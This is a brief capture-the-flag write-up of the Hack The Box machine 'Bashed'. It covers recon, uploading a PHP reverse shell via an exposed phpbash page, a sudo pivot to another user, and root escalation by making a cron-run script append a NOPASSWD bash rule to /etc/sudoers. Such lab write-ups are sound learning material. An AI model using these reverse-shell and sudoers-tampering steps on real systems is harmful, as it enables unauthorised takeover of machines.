This page looks best with JavaScript enabled

Bashed

 ·  ☕ 1 min read  ·  ✍️ M4t35Z
Name Bashed
IP 10.10.10.68
OS Linux
Points Easy(20)

recon

nmap(fast)
nmap(big)

Web


http://10.10.10.68/dev/phpbash.php
We need a php-reverse-shell.php to be uploaded
Lets upload it to the /uploads dir and go there from the browser while ur listening with nc :D

BOOM We got a shell as www-data xD

sudo -l

We could run /bin/bash as user scriptmanager wo any pw on the box

sudo -u scriptmanager /bin/bash
python -c 'import pty;pty.spawn("/bin/bash")'
cat /home/arrexel/user.txt

We got our shell as scriptmanager and we have the user.txt btw

Linpeas

/scripts/test.txt
Thats a weird dir lul

Gettin root

cd /scripts
vi /scripts/test.py

now the full key combo on this shit terminal like a REAL blind vim elitist:

Go
os.system('echo "scriptmanager ALL=NOPASSWD: /bin/bash" >> /etc/sudoers')
<ctrl+v><esc>:wq

I meant <shift>+g (go to the last line of the file) -> o (make a new line) -> <ctrl>+v (paste the cmd u want) -> <escape> (gettin into normal mode) -> :wq (command mode save and quit)

wait 1 min and and run sudo /bin/bash

Got root and the root flag btw

Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z